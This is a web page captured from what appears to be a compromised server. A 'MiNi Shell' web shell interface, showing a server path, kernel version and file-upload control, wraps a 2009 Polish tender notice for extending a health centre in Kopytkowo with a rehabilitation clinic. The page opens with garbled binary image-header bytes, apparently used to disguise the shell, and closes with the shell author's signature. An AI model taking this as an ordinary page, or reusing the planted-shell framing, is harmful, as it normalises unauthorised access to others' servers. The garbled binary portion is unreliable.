JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/128286-N-2009.html

<p class="kh_header"><b>Smętowo Graniczne: Rozbudowa Gminnego Ośrodka Zdrowia w Kopytkowie o poradnię rehabilitacyjną.</b><br>
<b>Numer ogłoszenia: 128286 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smętowo Graniczne , ul. Dworcowa 10, 83-230 Smętowo Graniczne, woj. pomorskie, tel. 058 5619033, faks 058 5619520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smetowo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Gminnego Ośrodka Zdrowia w Kopytkowie o poradnię rehabilitacyjną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Rozbudowa Gminnego Ośrodka Zdrowia w Kopytkowie o poradnię rehabilitacyjną.
Przedmiotem inwestycji zgodnie z dokumentacją przygotowaną przez Zamawiającego na działce nr 62  w Kopytkowie jest rozbudowa istniejącego budynku, będącego siedzibą Gminnego Ośrodka Zdrowia, polegająca na dobudowaniu łącznikiem do istniejącego obiektu od strony południowej nowego budynku poradni rehabilitacyjnej, określanej w dokumentacji technicznej jako oddział rehabilitacji. Zaprojektowany budynek jest budynkiem placówki zdrowotnej o powierzchni zabudowy 337,00 m2, powierzchni użytkowej 281,89 m2, kubaturze 1682,00 m3, jednokondygnacyjny, w skład którego wchodzą:
- gabinet lekarski
- 2 gabinety fizjoterapii
- 2 gabinety kinezyterapii
- pomieszczenie do masażu ręcznego
- gabinet hydroterapii
- inne pomieszczenia pomocnicze jak toalety, recepcja, poczekalnie, szatnia, kącik dla sprzątaczki.
Budynek ma być wyposażony w instalację wodociągową, kanalizacyjną, c.o., elektryczną. Ogrzewanie w zakresie ciepłej wody oraz c.o. z istniejącej kotłowni.
Ścieki sanitarne odprowadzane będą do istniejącej kanalizacji sanitarnej. 
W zakres zadania wchodzi:
1. Elementy konstrukcyjne.
1.1.  Fundamenty.
Stwierdzono, że pod projektowanym obiektem zalegają piaski i żwiry pod warstwą humusu, które nadają się do bezpośredniego posadowienia na nich budynku.
Zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 września 1998 r. W sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych (Dz. U. Nr 126, poz. 839) zaprojektowany obiekt zaliczony jest do pierwszej kategorii geotechnicznej.
 Przyjęto grunt kategorii II o średniej wytrzymałości od 0,15 do 0,28 Mpa.              W projekcie przyjęto maksymalne naprężenia pod ławami fundamentowymi:
			qfn=0,20 MPa
Po wykonaniu wykopu pod całym budynkiem stwierdzić należy, czy grunt odpowiada założeniom projektu. Ławy fundamentowe wykonać z betonu C16/20, zbrojonego prętami ze stali BST500 (klasa A-III) i strzemionami ze stali St0S (kl. A-0) według projektu. Pod fundamentami wykonać 10cm. podlewki z chudego betonu C8/10.
UWAGA! 
W narożnikach budynku oraz w części środkowej do zbrojenia fundamentów przyspawać bednarkę wypuszczoną na zewnątrz ścian w celu podłączenia uziomów odgromowych.
1.2.	Ściany fundamentowe.
Ściany fundamentowe przyjęto z bloczków betonowych, wykonanych z betonu C20/25 na zaprawie cementowej marki 5,0 MPa. Ściany zewnętrzne ocieplić polistyrenem ekstrudowanym o grubości zgodnej z projektem architektonicznym (co najmniej 8 cm).
1.3.	Ściany zewnętrzne.
Ściany zewnętrzne zaprojektowano w technologii tradycyjnej z bloczków gazobetonowych na zaprawie cementowo-wapiennej marki 1,5 MPa. Ściany zewnętrzne ocieplić polistyrenem o grubości zgodnej z projektem architektonicznym (10 cm i 12cm). 
1.4.    Strop.
Zaprojektowano płytę żelbetową, wylewaną na mokro na miejscu budowy. Stosować beton C20/25 oraz zbrojenie ze stali BST500 (34GS) i pręty rozdzielcze ze stali St0. Szczegóły zbrojenia pokazano na rysunkach konstrukcyjnych.
1.5.  Nadproża, podciągi i wieniec.
Nadproża o rozpiętości w świetle muru do 240cm wykonać z belek żelbetowych, prefabrykowanych typu L-19. Szczegóły zbrojenia pozostałych elementów pokazano na rysunkach konstrukcyjnych.
1.6. Ścianki działowe.
Ścianki działowe częściowo wymurować z płytek gazobetonowych odmiany 0,6 MPa i grubości 12 cm, na zaprawie cementowo-wapiennej marki 1,5 MPa. Część ścianek zaprojektowano na profilach stalowych, ocynkowanych C100, wypełnionych wełną mineralną, osłoniętą folia polietylenową. Ścianki wykonać zgodnie z projektem architektonicznym, w którym oznaczono rodzaje materiału, z którego wykonano ścianki. Szachty instalacyjne osłonić ściankami z płyt RIGIPS na stelażu CW 75/06.
1.7. Sufity podwieszone.
Pod stropem żelbetowym zaprojektowano przestrzeń powyżej sufitu podwieszonego. Będą tam umieszczone wszystkie projektowane instalacje, w tym przede wszystkim wentylacja mechaniczna. Sufit podwiesić za pomocą ocynkowanych wieszaków stalowych do stropu żelbetowego.
1.8. Sufity podwieszone.
Zaprojektowano dach o konstrukcji drewnianej, płatwiowo-kleszczowy. Zastosowano drewno konstrukcyjne klasy C-30. Drewno przed zamontowaniem należy zaimpregnować zestawami uodparniającymi na działanie ognia oraz grzybów. Preparaty winny posiadać atest zezwalający na zastosowanie w pomieszczeniach przeznaczonych dla przebywania ludzi. 
1.9. Podjazd dla osób niepełnosprawnych.
Pozostanie istniejący podjazd. Konieczne będzie skorygowanie dolnej części podjazdu i wykonanie nowych balustrad. 
Balustrady wykonać ze stali szlachetnej. Dla oszczędności dopuszcza się wykonanie balustrady ze stali zwykłej malowanej zestawem farb antykorozyjnych.
2. Część wykończeniowa.
Elementy wykończeniowe należy wykonać z uwzględnieniem uwag zawartych w opisach na rysunkach.
2.1.	  Posadzki.
Wszystkie posadzki w pomieszczeniach wykonać zgodnie z opisami na rzucie i przekroju. Muszą być łatwo zmywalne.
Posadzki w części komunikacyjnej wykonać z płytek ceramicznych, posiadających V klasę ścieralności typu GRES. W gabinetach lekarskich, salach terapeutycznych, pomieszczeniach socjalnych typu szatnie czy też w pomieszczeniach biurowych zakłada się posadzki również łatwo zmywalne lecz z wykładzin zgrzewanych, rulonowych z PVC.
2.2.	     Stolarka.
Wszystkie okna i drzwi wykonać zgodnie z zestawieniem oraz z opisami na rzutach. W projektowanych pomieszczeniach występuje kilka rodzajów drzwi i okien.
Przewiduje się wykonanie większości drzwi i okien wg poniższego wykazu:
1.	drzwi wewnętrzne do pomieszczeń: pełne, z drewna klejonego.
2.	drzwi wejściowe od strony placu:  zaprojektowano z aluminium.
3.	Stolarkę okienną wykonać z profili PCV, o współczynniku izolacyjności termicznej nie większym niż 1,3. Okna powinny posiadać system mikrowentylacji. Parapety zewnętrzne i wewnętrzne typu PCV.
2.3.	Tynki i okładziny ścienne.
Na ścianach murowanych wykonać tynki gładkie cementowo-wapienne kategorii III..
W pomieszczeniach mokrych takich jak: łazienki, umywalnie, w.c. całe ściany wyłożyć płytkami glazurowanymi do sufitu.
W pomieszczeniach do terapii ściany wyłożyć płytkami glazurowanymi do wysokości 2,1 m. Powyżej glazury ściany i sufity malować farbami emulsyjnymi.
2.4	  Wentylacja.
Wszystkie pomieszczenia muszą być wentylowane. 
W większości pomieszczeń zaprojektowano wentylację mechaniczną. Wentylację mechaniczną należy wykonać zgodnie z odrębnym opracowaniem.
3. Budynki do rozebrania.
Teren, na którym znajduje się omawiany budynek ogrodzony jest ogrodzeniem z siatki. Można wykorzystać to ogrodzenie jako zabezpieczenie przed dostępem osób postronnych na plac rozbiórki. Należy jedynie wykonać ogrodzenie zabezpieczające od strony terenu działki. Budynki przeznaczone do rozbiórki to obiekty drewniane parterowe o wysokości do 3m zlokalizowane bezpośrednio przy granicy działki. 
Pracownicy, prowadzący prace rozbiórkowe muszą być zaopatrzeni w kaski ochronne, odzież ochronną oraz odpowiednie narzędzia. 
Konstrukcja dachowa budynków gospodarczych powinna zostać rozebrana w pierwszej kolejności. Prace rozbiórkowe rozpocząć od rozebrania pokrycia dachowego. Rozbiórkę prowadzić w miarę możliwości tak, aby nie uszkodzić rozbieranych elementów, głównie w celu zabezpieczenia się przed nie kontrolowanym spadaniem elementów. Należy odciąć elementy konstrukcyjne dachu przy podporach, a następnie złożyć na placu rozbiórki.
W następnej kolejności przystąpić należy do rozbiórki ścian zaczynając od elementów osłonowych. Przed rozpoczęciem demontażu słupów należy je zabezpieczyć przed przewróceniem za pomocą podparcia stemplami lub przez zawieszenie ich górnej części na haku dźwigu. Ostatecznie rozkuć elementy podparcia słupów i zniwelować teren w miejscu gdzie były zlokalizowane budynki.
4.  Szczegółowy opis przedmiotu zamówienia stanowią:  przedmiary robót, dokumentacja projektowa i opis techniczny  oraz specyfikacja warunków technicznych wykonania i odbioru robót , stanowiące załączniki do SIWZ.
 5.   Wymagany okres gwarancji na wykonane roboty ( materiały i robociznę) 
wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych  i podpisania (bez uwag) protokołu końcowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.00-8, 45.11.12.00-0, 45.26.23.00-4, 45.00.00.00-7, 45.26.23.10-7, 45.44.22.00-9, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.26.25.00-6, 45.23.13.00-8, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1)posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 u.z.p. 
2)posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia.
a)	wykonać w okresie ostatnich 5 lat, przed dniem wszczęcia postępowania a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 robót,  których przedmiotem jest budowa budynków o kubaturze powyżej 1000 m3. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót wraz z dokumentami potwierdzającymi ich należyte wykonanie (referencje , protokoły odbioru itp.)
b) dysponować osobą lub osobami do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych oraz w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych przy realizacji niniejszego zamówienia oraz podać informacje na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności.

3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunku posiadania uprawnień do wykonywania działalności oraz na potwierdzenie nie podlegania wykluczeniu z postępowania Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)oświadczenie o spełnianiu warunków udziału w postępowaniu według wzoru  (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
b)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
c)zaświadczenie potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne  wystawionego nie wcześniej niż 3 miesięce przed upływem terminu składania ofert .(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
      W celu potwierdzenia spełniania warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia Wykonawcy  zobowiązani są przedłożyć:
-  wykaz osób , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
- pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał osoby, którymi będzie dysponował,
- dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (uprawnienia budowlane wraz z zaświadczeniem o przynależności do właściwej izby samorządu zawodowego).
W celu potwierdzenia ,że Wykonawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  zobowiązani są złożyć sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich dwóch lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
Wykonawcy powinni złożyć również pozostałe dokumenty określone w SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.smetowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Smętowo Graniczne, ul. Dworcowa 10, 83-230 Smętowo Graniczne..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 11:00, miejsce: Urząd Gminy Smętowo Graniczne, ul. Dworcowa 10, 83-230 Smętowo Graniczne, pokój nr 3 , Sekretariat Urzędu..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com